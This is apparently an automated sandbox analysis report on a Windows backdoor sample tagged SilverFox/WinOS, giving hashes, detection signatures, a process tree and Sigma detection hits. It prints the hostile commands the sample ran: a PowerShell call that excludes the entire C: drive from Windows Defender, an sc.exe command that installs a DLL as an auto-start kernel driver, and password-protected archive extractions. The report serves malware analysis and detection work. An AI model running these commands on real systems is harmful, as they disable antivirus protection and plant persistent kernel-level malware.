Windows Analysis Report
yvaKqhmD4L.exe

Overview

General Information

Sample name: yvaKqhmD4L.exe (renamed because original name is a hash value)
Original sample name: DEF808BED70D77EC70F201B7F9EDC125295D26128DF9E7E1796311742FC0D00A.exe
Analysis ID: 1580559
MD5: 17ae5643e60881d69e3e25122ca1fc67
SHA1: ab0e0bec78013e6406148f1dbc527756af31e988
SHA256: def808bed70d77ec70f201b7f9edc125295d26128df9e7e1796311742fc0d00a
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • yvaKqhmD4L.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\yvaKqhmD4L.exe" MD5: 17AE5643E60881D69E3E25122CA1FC67)
    • yvaKqhmD4L.tmp (PID: 6460 cmdline: "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" MD5: 6AD6576147BC6B91DD40240772510F4F)
      • powershell.exe (PID: 6592 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 2124 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • yvaKqhmD4L.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT MD5: 17AE5643E60881D69E3E25122CA1FC67)
        • yvaKqhmD4L.tmp (PID: 2060 cmdline: "C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp" /SL5="$A022E,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT MD5: 6AD6576147BC6B91DD40240772510F4F)
          • 7zr.exe (PID: 5592 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6476 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5164 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3384 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6424 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6644 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2996 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5688 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6016 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6528 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 980 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3688 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5480 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6576 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 928 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6904 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3336 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6036 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5664 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6592 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2828 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5428 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6572 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 792 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5324 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5956 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5236 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6904 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3336 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5664 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1608 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4296 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3336 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1196 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6240 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6460 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4304 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5496 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3336 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6576 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3584 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2916 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2828 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5664 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5496 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2132 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6460 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6424 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp, ParentProcessId: 6460, ParentProcessName: yvaKqhmD4L.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6592, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3384, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp, ParentProcessId: 6460, ParentProcessName: yvaKqhmD4L.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6592, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3384, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp, ParentProcessId: 6460, ParentProcessName: yvaKqhmD4L.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6592, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; ReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; Virustotal: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbc; ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbc; Virustotal: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\update.vbc; ReversingLabs: Detection: 26%
Source: yvaKqhmD4L.exe; Virustotal: Detection: 11%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 86.7% probability
Source: yvaKqhmD4L.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: yvaKqhmD4L.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1793648038.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1793459655.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C1EE090 FindFirstFileA,FindClose,FindClose,6_2_6C1EE090
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CF6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00CF6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CF7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00CF7496
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
